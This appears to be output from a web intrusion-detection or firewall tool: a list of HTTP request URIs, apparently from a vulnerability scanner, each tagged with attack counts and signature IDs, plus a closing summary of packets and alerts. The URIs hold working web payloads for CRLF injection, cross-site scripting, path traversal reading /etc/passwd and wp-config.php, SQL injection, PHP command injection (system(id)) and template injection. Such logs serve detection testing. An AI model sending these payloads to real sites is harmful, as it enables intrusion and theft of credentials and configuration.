Packet [661]	Uri [/web/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [662]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001516]
Packet [663]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [664]	Uri [/web/wp-config.php.bak]	Nattacks [2]	Signatures	[300001512]	[300001927]
Packet [665]	Uri [/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [666]	Uri [/web/interlib/report/ShowImage?localPath=etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [667]	Uri [/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E]	Nattacks [3]	Signatures	[300000508]	[300000528]	[300000550]
Packet [668]	Uri [/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [669]	Uri [/web/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [1]	Signatures	[300001359]
Packet [670]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [1]	Signatures	[300001026]
Packet [671]	Uri [/web/wp-config.php.old]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [672]	Uri [/web/mod/lti/auth.php?redirect_uri=javascript:alert('25SnmIOQ3Zj3EzmxCOldAwTYQAb')]	Nattacks [3]	Signatures	[300000052]	[300000508]	[300001882]
Packet [673]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [674]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [678]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [1]	Signatures	[300001026]
Packet [679]	Uri [/web/wp-config.php.dist]	Nattacks [1]	Signatures	[300001512]
Packet [682]	Uri [/web/../../../..//etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [683]	Uri [/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [686]	Uri [/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001313]	[300001871]
Packet [690]	Uri [/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300000077]	[300001559]
Packet [691]	Uri [/web/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [697]	Uri [/web/../example.com]	Nattacks [1]	Signatures	[300000067]
Packet [698]	Uri [/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000516]	[300000528]	[300000550]
Packet [703]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [705]	Uri [/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E]	Nattacks [3]	Signatures	[300000508]	[300000528]	[300000550]
Packet [710]	Uri [/web/(download)/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [711]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [1]	Signatures	[300001026]
Packet [712]	Uri [/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001313]	[300001871]
Packet [713]	Uri [/web/../../../..//etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [719]	Uri [/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [721]	Uri [/web/wp-config.php.dist]	Nattacks [1]	Signatures	[300001512]
Packet [727]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [4]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]
Packet [729]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [730]	Uri [/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [731]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000516]	[300000528]
Packet [732]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [738]	Uri [/web/download.do?file=../../../../config.text]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [740]	Uri [/web/wp-config.php.inc]	Nattacks [2]	Signatures	[300001512]	[300001517]
Packet [744]	Uri [/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20]	Nattacks [7]	Signatures	[300000052]	[300000068]	[300001024]	[300001025]	[300001081]	[300001085]	[300002838]
Packet [756]	Uri [/web/wp-content/debug.log]	Nattacks [1]	Signatures	[300001518]
Packet [757]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [761]	Uri [/web/search?search_key=%7B%7B1337*1338%7D%7D]	Nattacks [1]	Signatures	[300000035]
Packet [766]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000516]	[300000528]
Packet [768]	Uri [/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [770]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [4]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]
Packet [771]	Uri [/web/wp-config.php.inc]	Nattacks [2]	Signatures	[300001512]	[300001517]
Packet [772]	Uri [/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20]	Nattacks [7]	Signatures	[300000052]	[300000068]	[300001024]	[300001025]	[300001081]	[300001085]	[300002838]
Packet [774]	Uri [/web/lib///....//....//....//....//....//....//....//....//etc//passwd]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [775]	Uri [/web/download.do?file=../../../../config.text]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [776]	Uri [/web/wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [782]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [783]	Uri [/web/wp-content/debug.log]	Nattacks [1]	Signatures	[300001518]
Packet [786]	Uri [/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [787]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [788]	Uri [/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [791]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [793]	Uri [/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa]	Nattacks [2]	Signatures	[300000508]	[300001882]
Packet [799]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [6]	Signatures	[300000039]	[300000040]	[300000052]	[300000068]	[300001130]	[300002743]
Packet [802]	Uri [/web/hedwig.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [803]	Uri [/web/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [807]	Uri [/web/wp-config.php.html]	Nattacks [1]	Signatures	[300001512]
Packet [812]	Uri [/web/search?search_key=%7B%7B1337*1338%7D%7D]	Nattacks [1]	Signatures	[300000035]
Packet [813]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [4]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]
Packet [816]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [818]	Uri [/web/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [819]	Uri [/web/portal/info.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [820]	Uri [/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [821]	Uri [/web/wp-includes/rss-functions.php]	Nattacks [1]	Signatures	[300001860]
Packet [822]	Uri [/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [823]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [825]	Uri [/web/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg]	Nattacks [2]	Signatures	[300000508]	[300000528]
Packet [828]	Uri [/web/compress.php?file=../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [830]	Uri [/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [832]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [836]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [838]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [842]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [844]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [6]	Signatures	[300000039]	[300000040]	[300000052]	[300000068]	[300001130]	[300002743]
Packet [847]	Uri [/web/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [850]	Uri [/web/hedwig.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [851]	Uri [/web/..%5cetc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [852]	Uri [/web/..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [853]	Uri [/web/..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [857]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [859]	Uri [/web/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [862]	Uri [/web/portal/info.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [863]	Uri [/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [864]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [866]	Uri [/web/wp-config.php.save]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [867]	Uri [/web/compress.php?file=../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [869]	Uri [/web/wp-config.php~]	Nattacks [2]	Signatures	[300001500]	[300001512]
Packet [874]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [875]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2]	Signatures	[300000067]	[300001145]
Packet [880]	Uri [/web/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [884]	Uri [/web/..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [885]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [886]	Uri [/web/wp-config.php~]	Nattacks [2]	Signatures	[300001500]	[300001512]
Packet [887]	Uri [/web/wp-config.php-backup]	Nattacks [1]	Signatures	[300001512]
Packet [889]	Uri [/web/wp-config.php.orig]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [893]	Uri [/web/wp-config.php.original]	Nattacks [1]	Signatures	[300001512]
Packet [895]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [896]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [901]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [902]	Uri [/web/static/..%5cetc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [903]	Uri [/web/static/..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [904]	Uri [/web/static/..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [905]	Uri [/web/static/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [906]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [907]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [908]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [909]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [910]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [915]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [916]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001559]
Packet [917]	Uri [/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001559]
Packet [918]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [919]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [921]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [926]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [927]	Uri [/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [943]	Uri [/web//example.com/..;/css]	Nattacks [2]	Signatures	[300000051]	[300002755]
Packet [956]	Uri [/web/@https://example.com]	Nattacks [1]	Signatures	[300001879]
# N. packets [1012], [434] with alerts, N. Alerts [1159]
# Execution time: 0.281238 s
